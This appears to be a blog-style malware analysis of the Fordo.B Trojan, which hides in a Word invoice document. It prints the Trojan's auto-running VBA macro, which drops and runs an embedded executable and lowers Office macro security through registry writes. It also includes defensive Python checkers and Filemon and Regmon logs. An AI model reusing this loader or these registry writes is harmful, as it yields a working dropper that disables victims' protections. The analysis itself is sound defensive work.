Fordo.B: The Trojan arrives in the Word document Rechnung.doc
The Trojan Fordo.B landed fresh on my desk yesterday, and the thing appears to be very new: on 09.09. neither Avira, nor GData, nor ESafe detected it. Since I have not yet found any technical information on this malware on the Internet, I have compiled logs that document its accesses to the file system and the Windows registry.
Trojan structure
The Trojan is a Word file (Rechnung.doc, possibly also under other file names) containing a Visual Basic script that runs when the file is opened. If macro security in Word is configured accordingly, the VBA code is never executed.
The VBA script carries an encoded EXE file, which the Trojan writes to the hard disk. The VBA code looks like this:
Private Sub MyMessage()
End Sub

Private Sub Loader()
    Dim dumpfile As String: Dim exefile As String
    Dim i As Long
    Call Shellcode
    For i = 1 To iBlockCount
        dumpfile = dumpfile & b(i)
    Next i
    Dim parsearr() As String: parsearr = Split(dumpfile, "|", -1, vbTextCompare)
    For i = 0 To iSymbols - 1
        exefile = exefile & Chr(parsearr(i))
    Next i
    Dim NameOfLocalFile As String: Dim PathOfWriteDir As String: Dim DatNr As Integer
    NameOfLocalFile = "whlp32.exe"
    PathOfWriteDir = Environ("USERPROFILE")
    ChDrive (PathOfWriteDir): ChDir (PathOfWriteDir): DatNr = FreeFile(): Open NameOfLocalFile For Binary Access Read Write As DatNr
    Put #1, , exefile
    Close #1
    Shell (NameOfLocalFile)
    Call DisableSecurity
    Call MyMessage
End Sub

Private Sub Document_Open()
    Call Loader
End Sub

Private Sub DisableSecurity()
    Dim objShell: Set objShell = CreateObject("WScript.Shell"): On Error Resume Next
    objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level", 1, "REG_DWORD"
    objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security\Level", 1, "REG_DWORD"
    objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\Level", 1, "REG_DWORD"
    objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
    objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
    objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
    objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level", 1, "REG_DWORD"
    objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
End Sub
The Shellcode() method holds the encoded EXE file as an array of strings. (Understandably, I am not posting that part here.)
The DisableSecurity() method changes the Office security settings: it sets the per-user macro security value for Word and Excel (Level for versions 9.0 to 11.0, VBAWarnings for 12.0) to 1, the lowest level. The script thus appears to be written to be backward compatible down to Office 2000 (version 9).
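As an added example (not code from the original post): a small Python audit that checks exported HKCU Office macro-security values against a hardened baseline and flags exactly the keys that DisableSecurity() writes. It does not touch the live registry; the entries, which you would obtain on the affected machine with reg export or a WMI/PowerShell query, are passed in as (key, value name, data) tuples, and the sample export in the block is constructed. The value meanings (Level: 1 = Low up to 4 = Very High; VBAWarnings: 1 = enable all macros up to 4 = disable all) are documented Office settings; the baseline values chosen here (Level 3, VBAWarnings 2) are this example's assumption.

```python
from typing import Dict, Iterable, List, Tuple

HKCU_OFFICE = r"HKEY_CURRENT_USER\Software\Microsoft\Office"

# Office 2000/XP/2003 (versions 9.0-11.0) store the macro security level in
# "Level": 1 = Low, 2 = Medium, 3 = High, 4 = Very High.
# Office 2007 (12.0) uses "VBAWarnings": 1 = enable all macros,
# 2 = disable with notification, 3 = disable except signed, 4 = disable all.
LEGACY_VERSIONS = ("9.0", "10.0", "11.0")
APPS = ("Word", "Excel")
WEAK_VALUE = 1                              # what DisableSecurity() writes everywhere
BASELINE = {"Level": 3, "VBAWarnings": 2}   # assumed hardening baseline (example choice)


def expected_keys() -> List[Tuple[str, str]]:
    """(key, value name) pairs that DisableSecurity() targets."""
    keys = []
    for app in APPS:
        for ver in LEGACY_VERSIONS:
            keys.append(("\\".join([HKCU_OFFICE, ver, app, "Security"]), "Level"))
        keys.append(("\\".join([HKCU_OFFICE, "12.0", app, "Security"]), "VBAWarnings"))
    return keys


def audit(entries: Iterable[Tuple[str, str, int]]) -> List[Dict[str, object]]:
    """Return one finding for every monitored value that sits below the baseline.

    Registry paths and value names are case-insensitive, so both are lowered
    before lookup; the finding reports the canonical value name.
    """
    monitored = {(k.lower(), n.lower()): n for k, n in expected_keys()}
    findings = []
    for key, name, data in entries:
        canonical = monitored.get((key.lower(), name.lower()))
        if canonical is None:
            continue
        if data < BASELINE[canonical]:
            findings.append({
                "key": key, "value": canonical, "data": data,
                "baseline": BASELINE[canonical],
                "note": ("macros run without any prompt" if data == WEAK_VALUE
                         else "below baseline (prompting, not blocking)"),
            })
    return findings


def sample_export() -> List[Tuple[str, str, int]]:
    """Constructed export as it might look after the dropper ran, plus an unrelated value."""
    rows = [(k, n, WEAK_VALUE) for k, n in expected_keys()]
    rows.append(("\\".join([HKCU_OFFICE, "12.0", "Word", "Options"]), "AutoSave", 1))
    return rows


if __name__ == "__main__":
    for f in audit(sample_export()):
        print(f"{f['key']}\\{f['value']} = {f['data']} (baseline {f['baseline']}): {f['note']}")
```

The point of the check is that a value of 1 in any of these eight locations is never a legitimate enterprise configuration, so it is a cheap indicator to include in a host baseline scan after an incident like this one; the registry changes persist after the Word document is closed and silently keep macros enabled for every document the user opens afterwards.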
What happens after the Word file is opened?
To find out, I let the tools Filemon and Regmon run in the background while the document was being opened. The log looks like this (shortened for readability):
svchost.exe:760 CREATE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf
svchost.exe:760 OPEN C:\WINDOWS\Prefetch\SUCCESS Options: Open Directory
winlogon.exe:448 DIRECTORY C:\WINDOWS Change Notify
svchost.exe:760 OPEN C:\WINDOWS\Prefetch\ SUCCESS Options: Open Directory
winlogon.exe:448 DIRECTORY C:\WINDOWS Change Notify
svchost.exe:760 WRITE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf SUCCESS Offset: 0 Length: 97534
svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf SUCCESS
WINWORD.EXE:3936 OPEN C:\Temp SUCCESS Options: Open Directory Access: Traverse
WINWORD.EXE:3936 CLOSE C:\Temp SUCCESS
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator SUCCESS Options: Open Directory Access: Traverse
WINWORD.EXE:3936 CLOSE C:\Temp SUCCESS
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator SUCCESS Options: Open Directory Access: Traverse
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator SUCCESS
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: OpenIf Access: All
WINWORD.EXE:3936 WRITE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Offset: 0 Length: 45297
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Programme\Microsoft Office\Office12\whlp32.exe FILE NOT FOUND Attributes: Error
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: Open Access: All
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\WINDOWS\system32\Apphelp.dll SUCCESS Options: Open Access: Execute
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Length: 126976
WINWORD.EXE:3936 CLOSE C:\WINDOWS\system32\Apphelp.dll SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\WINDOWS\system32\Apphelp.dll SUCCESS Options: Open Access: Execute
WINWORD.EXE:3936 CLOSE C:\WINDOWS\system32\Apphelp.dll SUCCESS
WINWORD.EXE:3936 OPEN C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Options: Open Access: All
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
WINWORD.EXE:3936 OPEN C:\WINDOWS\AppPatch\systest.sdb FILE NOT FOUND Options: Open Access: All
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 CLOSE C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe.Manifest FILE NOT FOUND Options: Open Access: All
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
whlp32.exe:3984 OPEN C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
whlp32.exe:3984 READ C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Offset: 0 Length: 4726
whlp32.exe:3984 OPEN C: SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C: SUCCESS FileFsVolumeInformation
whlp32.exe:3984 OPEN C:\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\ SUCCESS FileNamesInformation
csrss.exe:424 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe BUFFER OVERFLOW FileNameInformation
csrss.exe:424 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
whlp32.exe:3984 DIRECTORY C:\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\WINDOWS\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\WINDOWS\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Length: 733696
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Length: 1057280
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\UNICODE.NLS SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\UNICODE.NLS SUCCESS Length: 89588
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\LOCALE.NLS SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\LOCALE.NLS SUCCESS Length: 249270
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\SORTTBLS.NLS SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\SORTTBLS.NLS SUCCESS Length: 22040
whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Length: 45297
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Length: 578560
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Length: 278016
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Length: 110080
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Length: 677888
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Length: 581120
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\SORTKEY.NLS SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\SORTKEY.NLS SUCCESS Length: 262148
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 1024 Length: 40960
whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 41984 Length: 2048
whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 44032 Length: 1024
whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: Traverse
whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe.Local FILE NOT FOUND Attributes: Error
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Length: 110080
whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Length: 110080
whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\$$$$ FILE NOT FOUND Options: Open Access: All
whlp32.exe:3984 READ C:\WINDOWS\system32\kernel32.dll SUCCESS Offset: 377856 Length: 4096
whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileAttributeTagInformation
whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 8192
whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 8192
whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 16384
whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 20480
whlp32.exe:3984 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
svchost.exe:760 OPEN C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: Open Access: All
svchost.exe:760 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
svchost.exe:760 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS
svchost.exe:760 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Attributes: A
svchost.exe:760 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: All
svchost.exe:760 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS FileInternalInformation
svchost.exe:760 CLOSE C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS
svchost.exe:760 CREATE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: OverwriteIf Access: All
svchost.exe:760 OPEN C:\WINDOWS\Prefetch\ SUCCESS Options: Open Directory Access: 00000000
svchost.exe:760 WRITE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Offset: 0 Length: 4798
svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS
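As an added example (not from the original post): a Python parser for Filemon-style lines of the kind shown above, plus a detection rule over them that reconstructs the drop-and-execute chain visible in the log, namely an Office process WRITEs a file with an executable extension, and a process with that image name shows up later in the same log. The sample lines are excerpts of the log above (one carries the sequence number and timestamp prefix, which the parser tolerates). The operation and result vocabulary is that of Filemon's output; the set of Office process names and executable extensions is this example's assumption.

```python
import re
from typing import Dict, List, Optional

# Excerpts of the Filemon log above, used as constructed sample input.
SAMPLE_LOG = [
    r"svchost.exe:760 CREATE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf",
    r"WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: OpenIf Access: All",
    r"WINWORD.EXE:3936 WRITE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Offset: 0 Length: 45297",
    r"WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS",
    r"WINWORD.EXE:3936 QUERY INFORMATION C:\Programme\Microsoft Office\Office12\whlp32.exe FILE NOT FOUND Attributes: Error",
    r"whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation",
    r"whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Options: Open Access: All",
    r"4089 07:25:30 whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\$$$$ FILE NOT FOUND Options: Open Access: All",
]

PREFIX_RE = re.compile(r"^\d+\s+\d\d:\d\d:\d\d\s+")          # optional "4089 07:25:30 "
PROC_RE = re.compile(r"^(?P<proc>\S+?):(?P<pid>\d+)\s+(?P<rest>.*)$")
RESULT_RE = re.compile(
    r"\s+(?P<result>SUCCESS|FILE NOT FOUND|NO MORE FILES|BUFFER OVERFLOW)(?:\s+(?P<detail>.*))?$")
# Operations seen in the log; multi-word ones listed so startswith() matches them whole.
OPS = ("QUERY INFORMATION", "SET INFORMATION", "DIRECTORY", "CREATE", "OPEN", "CLOSE", "READ", "WRITE")

# Assumptions of this example: which processes count as Office, which extensions as executable.
OFFICE_PROCS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js")


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Split one Filemon line into process, pid, operation, path, result and detail.

    Paths may contain spaces (C:\Dokumente und Einstellungen\...), so the path is
    whatever sits between the operation and the result keyword; lines without a
    result keyword (e.g. a bare CREATE) get result None.
    """
    line = PREFIX_RE.sub("", line.strip())
    m = PROC_RE.match(line)
    if not m:
        return None
    rest = m.group("rest")
    op = next((o for o in OPS if rest.startswith(o + " ")), None)
    if op is None:
        return None
    remainder = rest[len(op):].strip()
    r = RESULT_RE.search(remainder)
    if r:
        path, result, detail = remainder[:r.start()], r.group("result"), r.group("detail") or ""
    else:
        path, result, detail = remainder, None, ""
    return {"proc": m.group("proc"), "pid": int(m.group("pid")), "op": op,
            "path": path, "result": result, "detail": detail}


def find_dropper_chains(lines: List[str]) -> List[Dict[str, object]]:
    """Detect: Office process writes an executable, and that image later runs as a process."""
    pending: Dict[str, Dict[str, object]] = {}   # image name (lowercase) -> WRITE event
    chains = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        proc = str(e["proc"]).lower()
        path = str(e["path"]).lower()
        if proc in OFFICE_PROCS and e["op"] == "WRITE" and path.endswith(EXEC_EXT):
            pending[path.rsplit("\\", 1)[-1]] = e
        elif proc in pending:
            drop = pending.pop(proc)
            chains.append({"dropper": drop["proc"], "dropper_pid": drop["pid"],
                           "payload": drop["path"], "payload_pid": e["pid"]})
    return chains


if __name__ == "__main__":
    for c in find_dropper_chains(SAMPLE_LOG):
        print(f"{c['dropper']}:{c['dropper_pid']} wrote {c['payload']}, "
              f"later running as pid {c['payload_pid']}")
```

The same rule carries over to Process Monitor or Sysmon data (file-create events plus process-create events keyed on the image path); the ordering is what matters, since an Office process writing an EXE into the user profile is unusual on its own, and seeing that EXE start afterwards turns it into a high-confidence alert.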
4250 07:25:30 svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS
Registry accesses during opening:
76101 19.29856764 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\whlp32.exe NOTFOUND
76102 19.29915320 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS Access: 0x20019
76103 19.29917179 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Terminal Server\TSAppCompat SUCCESS 0x0
76104 19.29918941 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS
76105 19.29955742 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS Access: 0x20019
76106 19.29957246 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Terminal Server\TSAppCompat SUCCESS 0x0
76107 19.29958841 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS
76123 20.02893733 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS Access: 0x1
76124 20.02895640 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode NOTFOUND
76125 20.02897613 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS
76126 20.02931397 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDI32.dll NOTFOUND
76127 20.02935254 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\user32.dll NOTFOUND
76128 20.02991519 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\SafeBoot\Option NOTFOUND
76129 20.02994488 whlp32.exe:1664 OpenKey HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers SUCCESS Access: 0x1
